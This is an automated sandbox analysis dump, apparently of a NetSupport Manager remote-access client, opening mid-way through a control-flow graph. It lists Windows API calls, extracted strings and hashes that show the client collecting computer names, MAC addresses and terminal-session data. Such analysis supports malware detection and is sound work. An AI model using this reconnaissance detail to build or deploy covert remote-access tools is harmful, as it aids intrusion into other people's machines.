1140 1102e1b6-1102e1b8 1119->1140 1129 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 1127->1129 1130 1102e39c-1102e3a9 call 11035dd0 call 111618c1 1127->1130 1128->1127 1134 1102e374-1102e38d call 1102d330 1128->1134 1130->1129 1134->1127 1139->1149 1145 1102e1c0-1102e1d1 1140->1145 1145->1145 1145->1149 1152 1102e043-1102e04f 1146->1152 1147->1152 1164 1102dfd5-1102dfde 1147->1164 1169 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 1149->1169 1170 1102e32c-1102e339 call 11164010 1149->1170 1154 1102e092-1102e0a1 1152->1154 1155 1102e051-1102e05d 1152->1155 1154->1079 1160 1102e0a3-1102e0a4 FreeLibrary 1154->1160 1162 1102e06f-1102e073 1155->1162 1163 1102e05f-1102e06d GetProcAddress 1155->1163 1160->1079 1166 1102e084-1102e086 SetLastError 1162->1166 1167 1102e075-1102e078 1162->1167 1163->1162 1164->1152 1171 1102dfe0-1102e016 call 11146450 call 1112b270 1164->1171 1175 1102e08c 1166->1175 1167->1175 1206 1102e283-1102e299 call 11128ec0 1169->1206 1207 1102e26f-1102e27e call 11029450 1169->1207 1184 1102e33c-1102e341 CharUpperA 1170->1184 1171->1152 1189 1102e018-1102e03e call 11146450 call 11027920 1171->1189 1175->1154 1184->1105 1189->1152 1211 1102e2b2-1102e2ec call 110d0bd0 * 2 1206->1211 1212 1102e29b-1102e2ad call 110d0bd0 1206->1212 1207->1206 1219 1102e302-1102e32a call 11164010 call 110d07c0 1211->1219 1220 1102e2ee-1102e2fd call 11029450 1211->1220 1212->1211 1219->1184 1220->1219
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _malloc_memsetwsprintf
                                                                                  • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$14/03/16 10:38:31 V12.10F8$878411$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                  • API String ID: 3802068140-3299767256
                                                                                  • Opcode ID: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                  • Instruction ID: 727bed6a5d63171c4319a8bac454151215a042d106ed124055d9f0508de139ba
                                                                                  • Opcode Fuzzy Hash: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                  • Instruction Fuzzy Hash: 7932D275D0022A9FDF12DFA4DC84BEDB7B8AB44308F9445E9E55867280EB70AF84CB51

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1661 110a9c90-110a9cf2 LoadLibraryA GetProcAddress 1662 110a9cf8-110a9d09 SetupDiGetClassDevsA 1661->1662 1663 110a9e05-110a9e0d SetLastError 1661->1663 1664 110a9d0f-110a9d1d 1662->1664 1665 110a9f13-110a9f15 1662->1665 1668 110a9e19-110a9e1b SetLastError 1663->1668 1669 110a9d20-110a9d24 1664->1669 1666 110a9f1e-110a9f20 1665->1666 1667 110a9f17-110a9f18 FreeLibrary 1665->1667 1670 110a9f37-110a9f52 call 11161d01 1666->1670 1667->1666 1671 110a9e21-110a9e2c GetLastError 1668->1671 1672 110a9d3d-110a9d55 1669->1672 1673 110a9d26-110a9d37 GetProcAddress 1669->1673 1674 110a9e32-110a9e3d call 11162be5 1671->1674 1675 110a9ec0-110a9ed1 GetProcAddress 1671->1675 1672->1671 1684 110a9d5b-110a9d5d 1672->1684 1673->1668 1673->1672 1674->1669 1678 110a9edb-110a9edd SetLastError 1675->1678 1679 110a9ed3-110a9ed9 SetupDiDestroyDeviceInfoList 1675->1679 1683 110a9ee3-110a9ee5 1678->1683 1679->1683 1683->1665 1685 110a9ee7-110a9f09 CreateFileA 1683->1685 1686 110a9d68-110a9d6a 1684->1686 1687 110a9d5f-110a9d65 call 11162be5 1684->1687 1690 110a9f0b-110a9f10 call 11162be5 1685->1690 1691 110a9f22-110a9f2c call 11162be5 1685->1691 1688 110a9d6c-110a9d7f GetProcAddress 1686->1688 1689 110a9d85-110a9d9b 1686->1689 1687->1686 1688->1689 1693 110a9e42-110a9e4a SetLastError 1688->1693 1699 110a9d9d-110a9da6 GetLastError 1689->1699 1701 110a9dac-110a9dbf call 11162b51 1689->1701 1690->1665 1702 110a9f2e-110a9f2f FreeLibrary 1691->1702 1703 110a9f35 1691->1703 1693->1699 1699->1701 1704 110a9e81-110a9e92 call 110a9c30 1699->1704 1711 110a9ea2-110a9eb3 call 110a9c30 1701->1711 1712 110a9dc5-110a9dcd 1701->1712 1702->1703 1703->1670 1709 110a9e9b-110a9e9d 1704->1709 1710 110a9e94-110a9e95 FreeLibrary 1704->1710 1709->1670 1710->1709 1711->1709 1718 110a9eb5-110a9ebe FreeLibrary 1711->1718 1714 110a9dcf-110a9de2 GetProcAddress 1712->1714 1715 110a9de4-110a9dfb 1712->1715 1714->1715 1717 110a9e4f-110a9e51 SetLastError 1714->1717 1719 110a9e57-110a9e71 call 110a9c30 call 11162be5 1715->1719 1722 110a9dfd-110a9e00 1715->1722 1717->1719 1718->1670 1719->1709 1726 110a9e73-110a9e7c FreeLibrary 1719->1726 1722->1669 1726->1670
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(setupapi.dll,AD96CFBE,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
                                                                                  • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
                                                                                  • SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
                                                                                  • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
                                                                                  • _free.LIBCMT ref: 110A9D60
                                                                                  • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
                                                                                  • GetLastError.KERNEL32 ref: 110A9D9D
                                                                                  • _malloc.LIBCMT ref: 110A9DB3
                                                                                  • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
                                                                                  • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
                                                                                  • SetLastError.KERNEL32(00000078), ref: 110A9E1B
                                                                                  • GetLastError.KERNEL32 ref: 110A9E21
                                                                                  • _free.LIBCMT ref: 110A9E33
                                                                                  • SetLastError.KERNEL32(00000078), ref: 110A9E44
                                                                                  • SetLastError.KERNEL32(00000078), ref: 110A9E51
                                                                                  • _free.LIBCMT ref: 110A9E64
                                                                                  • FreeLibrary.KERNEL32(?,?), ref: 110A9E74
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                  • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                  • API String ID: 3464732724-3340099623
                                                                                  • Opcode ID: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                  • Instruction ID: 033bff87456eb4c9bd2d5bbaba34d7345019b106b940800e90953e4c12ebf53e
                                                                                  • Opcode Fuzzy Hash: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                  • Instruction Fuzzy Hash: F2816279E14259ABEB04DFF4EC84F9FFBB8AF48704F104528F921A6284EB759905CB50

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1923 11133920-1113395c 1924 11133962-11133984 call 1105dd10 1923->1924 1925 11133c84-11133c9f call 11161d01 1923->1925 1924->1925 1930 1113398a-1113399e GetLocalTime 1924->1930 1931 111339c1-11133a43 LoadLibraryA call 110098c0 call 11015c30 GetCurrentProcess 1930->1931 1932 111339a0-111339bc call 11146450 1930->1932 1939 11133a45-11133a5b GetProcAddress 1931->1939 1940 11133a5d-11133a64 GetProcessHandleCount 1931->1940 1932->1931 1939->1940 1941 11133a66-11133a68 SetLastError 1939->1941 1942 11133a6e-11133a76 1940->1942 1941->1942 1943 11133a92-11133a9e 1942->1943 1944 11133a78-11133a90 GetProcAddress 1942->1944 1947 11133aa0-11133ab8 GetProcAddress 1943->1947 1948 11133aba-11133ac5 1943->1948 1944->1943 1945 11133ac7-11133ad2 SetLastError 1944->1945 1945->1947 1947->1948 1949 11133ad4-11133adc SetLastError 1947->1949 1950 11133adf-11133aef GetProcAddress 1948->1950 1949->1950 1952 11133af1-11133afd K32GetProcessMemoryInfo 1950->1952 1953 11133aff-11133b01 SetLastError 1950->1953 1954 11133b07-11133b15 1952->1954 1953->1954 1955 11133b23-11133b2e 1954->1955 1956 11133b17-11133b1f 1954->1956 1957 11133b30-11133b38 1955->1957 1958 11133b3c-11133b47 1955->1958 1956->1955 1957->1958 1959 11133b55-11133b5f 1958->1959 1960 11133b49-11133b51 1958->1960 1961 11133b61-11133b68 1959->1961 1962 11133b6a-11133b6d 1959->1962 1960->1959 1963 11133b6f-11133b7d call 11146450 1961->1963 1962->1963 1964 11133b80-11133b92 1962->1964 1963->1964 1968 11133c5a-11133c68 1964->1968 1969 11133b98-11133baa call 110637c0 1964->1969 1970 11133c6a-11133c6b FreeLibrary 1968->1970 1971 11133c6d-11133c75 1968->1971 1969->1968 1976 11133bb0-11133bd1 call 1105dd10 1969->1976 1970->1971 1973 11133c77-11133c78 FreeLibrary 1971->1973 1974 11133c7a-11133c7f 1971->1974 1973->1974 1974->1925 1977 11133c81-11133c82 FreeLibrary 1974->1977 1980 11133bd3-11133bd9 1976->1980 1981 11133bdf-11133bfb call 1105dd10 1976->1981 1977->1925 1980->1981 1982 11133bdb 1980->1982 1985 11133c06-11133c22 call 1105dd10 1981->1985 1986 11133bfd-11133c00 1981->1986 1982->1981 1990 11133c24-11133c27 1985->1990 1991 11133c2d-11133c49 call 1105dd10 1985->1991 1986->1985 1987 11133c02 1986->1987 1987->1985 1990->1991 1993 11133c29 1990->1993 1995 11133c50-11133c53 1991->1995 1996 11133c4b-11133c4e 1991->1996 1993->1991 1995->1968 1997 11133c55 call 11027780 1995->1997 1996->1995 1996->1997 1997->1968
                                                                                  APIs
                                                                                    • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                  • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,AD96CFBE), ref: 1113398E
                                                                                  • LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
                                                                                  • GetCurrentProcess.KERNEL32 ref: 11133A27
                                                                                  • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
                                                                                  • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11133A62
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11133A68
                                                                                  • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
                                                                                  • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11133AC9
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11133AD6
                                                                                  • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
                                                                                  • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11133AFB
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11133B01
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11133C6B
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11133C78
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11133C82
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                  • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                  • API String ID: 263027137-1001504656
                                                                                  • Opcode ID: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                  • Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
                                                                                  • Opcode Fuzzy Hash: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                  • Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1999 1102dbc9 2000 1102dbd0-1102dbe1 1999->2000 2000->2000 2001 1102dbe3 2000->2001 2002 1102dd24-1102dd3d call 11142ac0 2001->2002 2005 1102dd43-1102dd45 2002->2005 2006 1102dbc0-1102dbc3 2002->2006 2009 1102de43-1102de5d call 111463d0 2005->2009 2010 1102dd4b-1102dd51 2005->2010 2007 1102dbc5-1102dbc7 2006->2007 2008 1102dbe8-1102dbf1 2006->2008 2007->2000 2008->2002 2011 1102dbf7-1102dbfe 2008->2011 2037 1102deb3-1102debf call 1102b4f0 2009->2037 2038 1102de5f-1102de78 call 1105dd10 2009->2038 2013 1102dd53-1102dd62 call 11144dc0 2010->2013 2014 1102dd68-1102dd78 2010->2014 2011->2002 2017 1102dcf3-1102dd08 call 11162de7 2011->2017 2018 1102dc05-1102dc07 2011->2018 2019 1102dd0a-1102dd1f call 11162de7 2011->2019 2020 1102dc9a-1102dccd call 111618c1 call 11142290 2011->2020 2021 1102dcdb-1102dcf1 call 11164010 2011->2021 2022 1102dc8b-1102dc95 2011->2022 2023 1102dccf-1102dcd9 2011->2023 2024 1102dc4c-1102dc52 2011->2024 2025 1102dc7c-1102dc86 2011->2025 2013->2014 2015 1102dd7a 2014->2015 2016 1102dd7f-1102dd9d call 1102cc10 2014->2016 2015->2016 2016->2009 2049 1102dda3-1102ddc8 call 110b7920 call 11146450 2016->2049 2017->2002 2018->2002 2036 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 2018->2036 2019->2002 2020->2002 2021->2002 2022->2002 2023->2002 2029 1102dc54-1102dc68 call 11162de7 2024->2029 2030 1102dc6d-1102dc77 2024->2030 2025->2002 2029->2002 2030->2002 2036->2002 2057 1102dec1-1102dec8 2037->2057 2058 1102de98-1102de9f 2037->2058 2038->2037 2054 1102de7a-1102de8c 2038->2054 2085 1102ddd3-1102ddd9 2049->2085 2086 1102ddca-1102ddd1 2049->2086 2054->2037 2074 1102de8e 2054->2074 2060 1102dea5-1102dea8 2057->2060 2063 1102deca-1102ded4 2057->2063 2058->2060 2061 1102e0aa-1102e0cb GetComputerNameA 2058->2061 2068 1102deaa-1102deb1 call 110b7920 2060->2068 2069 1102ded9 2060->2069 2066 1102e103-1102e109 2061->2066 2067 1102e0cd-1102e101 call 11027c30 2061->2067 2063->2061 2078 1102e10b-1102e110 2066->2078 2079 1102e13f-1102e152 call 11164010 2066->2079 2067->2066 2101 1102e157-1102e163 2067->2101 2077 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 2068->2077 2069->2077 2074->2058 2136 1102e07a-1102e082 SetLastError 2077->2136 2137 1102dfbc-1102dfd3 2077->2137 2084 1102e116-1102e11a 2078->2084 2095 1102e347-1102e36a 2079->2095 2092 1102e136-1102e138 2084->2092 2093 1102e11c-1102e11e 2084->2093 2088 1102dddb-1102dde2 call 11027d60 2085->2088 2089 1102de39 2085->2089 2086->2009 2088->2089 2105 1102dde4-1102de16 2088->2105 2089->2009 2100 1102e13b-1102e13d 2092->2100 2097 1102e132-1102e134 2093->2097 2098 1102e120-1102e126 2093->2098 2113 1102e392-1102e39a 2095->2113 2114 1102e36c-1102e372 2095->2114 2097->2100 2098->2092 2104 1102e128-1102e130 2098->2104 2100->2079 2100->2101 2106 1102e165-1102e17a call 110b7920 call 11029bd0 2101->2106 2107 1102e17c-1102e18f call 11081a70 2101->2107 2104->2084 2104->2097 2127 1102de20-1102de2f call 110f6080 2105->2127 2128 1102de18-1102de1e 2105->2128 2141 1102e1d3-1102e1ec call 11081a70 2106->2141 2125 1102e191-1102e1b4 2107->2125 2126 1102e1b6-1102e1b8 2107->2126 2116 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 2113->2116 2117 1102e39c-1102e3a9 call 11035dd0 call 111618c1 2113->2117 2114->2113 2121 1102e374-1102e38d call 1102d330 2114->2121 2117->2116 2121->2113 2125->2141 2130 1102e1c0-1102e1d1 2126->2130 2132 1102de32-1102de34 call 1102d330 2127->2132 2128->2127 2128->2132 2130->2130 2130->2141 2132->2089 2143 1102e043-1102e04f 2136->2143 2137->2143 2158 1102dfd5-1102dfde 2137->2158 2159 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 2141->2159 2160 1102e32c-1102e339 call 11164010 2141->2160 2148 1102e092-1102e0a1 2143->2148 2149 1102e051-1102e05d 2143->2149 2148->2061 2156 1102e0a3-1102e0a4 FreeLibrary 2148->2156 2153 1102e06f-1102e073 2149->2153 2154 1102e05f-1102e06d GetProcAddress 2149->2154 2161 1102e084-1102e086 SetLastError 2153->2161 2162 1102e075-1102e078 2153->2162 2154->2153 2156->2061 2158->2143 2163 1102dfe0-1102e016 call 11146450 call 1112b270 2158->2163 2199 1102e283-1102e299 call 11128ec0 2159->2199 2200 1102e26f-1102e27e call 11029450 2159->2200 2177 1102e33c-1102e341 CharUpperA 2160->2177 2165 1102e08c 2161->2165 2162->2165 2163->2143 2182 1102e018-1102e03e call 11146450 call 11027920 2163->2182 2165->2148 2177->2095 2182->2143 2204 1102e2b2-1102e2ec call 110d0bd0 * 2 2199->2204 2205 1102e29b-1102e2ad call 110d0bd0 2199->2205 2200->2199 2212 1102e302-1102e32a call 11164010 call 110d07c0 2204->2212 2213 1102e2ee-1102e2fd call 11029450 2204->2213 2205->2204 2212->2177 2213->2212
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: $14/03/16 10:38:31 V12.10F8$878411$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                  • API String ID: 1029625771-1967907091
                                                                                  • Opcode ID: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                  • Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
                                                                                  • Opcode Fuzzy Hash: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                  • Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2219 111414a0-111414e1 call 11146450 2222 111414e7-11141543 LoadLibraryA 2219->2222 2223 11141569-11141593 call 11142e80 call 11146ee0 LoadLibraryA 2219->2223 2225 11141545-11141550 call 11017450 2222->2225 2226 11141557-11141560 2222->2226 2235 11141595-1114159b 2223->2235 2236 111415c3 2223->2236 2225->2226 2232 11141552 call 110cc7f0 2225->2232 2226->2223 2227 11141562-11141563 FreeLibrary 2226->2227 2227->2223 2232->2226 2235->2236 2238 1114159d-111415a3 2235->2238 2237 111415cd-111415ed GetClassInfoExA 2236->2237 2239 111415f3-1114161a call 11161d20 call 111444b0 2237->2239 2240 1114168e-111416e6 2237->2240 2238->2236 2241 111415a5-111415c1 call 1105dd10 2238->2241 2250 11141633-11141675 call 111444b0 call 111444e0 LoadCursorA GetStockObject RegisterClassExA 2239->2250 2251 1114161c-11141630 call 11029450 2239->2251 2252 11141722-11141728 2240->2252 2253 111416e8-111416ee 2240->2253 2241->2237 2250->2240 2278 11141677-1114168b call 11029450 2250->2278 2251->2250 2257 11141764-11141786 call 1105dd10 2252->2257 2258 1114172a-11141739 call 1110f420 2252->2258 2253->2252 2255 111416f0-111416f6 2253->2255 2255->2252 2261 111416f8-1114170f call 1112c830 LoadLibraryA 2255->2261 2270 11141794-11141799 2257->2270 2271 11141788-11141792 2257->2271 2268 1114175d 2258->2268 2269 1114173b-1114175b 2258->2269 2261->2252 2277 11141711-1114171d GetProcAddress 2261->2277 2274 1114175f 2268->2274 2269->2274 2275 111417a5-111417ab 2270->2275 2276 1114179b 2270->2276 2271->2275 2274->2257 2279 111417ad-111417b3 call 110f7d00 2275->2279 2280 111417b8-111417d1 call 1113cd80 2275->2280 2276->2275 2277->2252 2278->2240 2279->2280 2287 111417d7-111417dd 2280->2287 2288 11141879-1114188a 2280->2288 2289 111417df-111417f1 call 1110f420 2287->2289 2290 11141819-1114181f 2287->2290 2300 111417f3-11141809 call 1115d6d0 2289->2300 2301 1114180b 2289->2301 2292 11141845-11141851 2290->2292 2293 11141821-11141827 2290->2293 2294 11141853-11141859 2292->2294 2295 11141868-11141873 #17 LoadLibraryA 2292->2295 2297 1114182e-11141840 SetTimer 2293->2297 2298 11141829 call 11134930 2293->2298 2294->2295 2299 1114185b-11141861 2294->2299 2295->2288 2297->2292 2298->2297 2299->2295 2303 11141863 call 1112d6a0 2299->2303 2305 1114180d-11141814 2300->2305 2301->2305 2303->2295 2305->2290
                                                                                  APIs
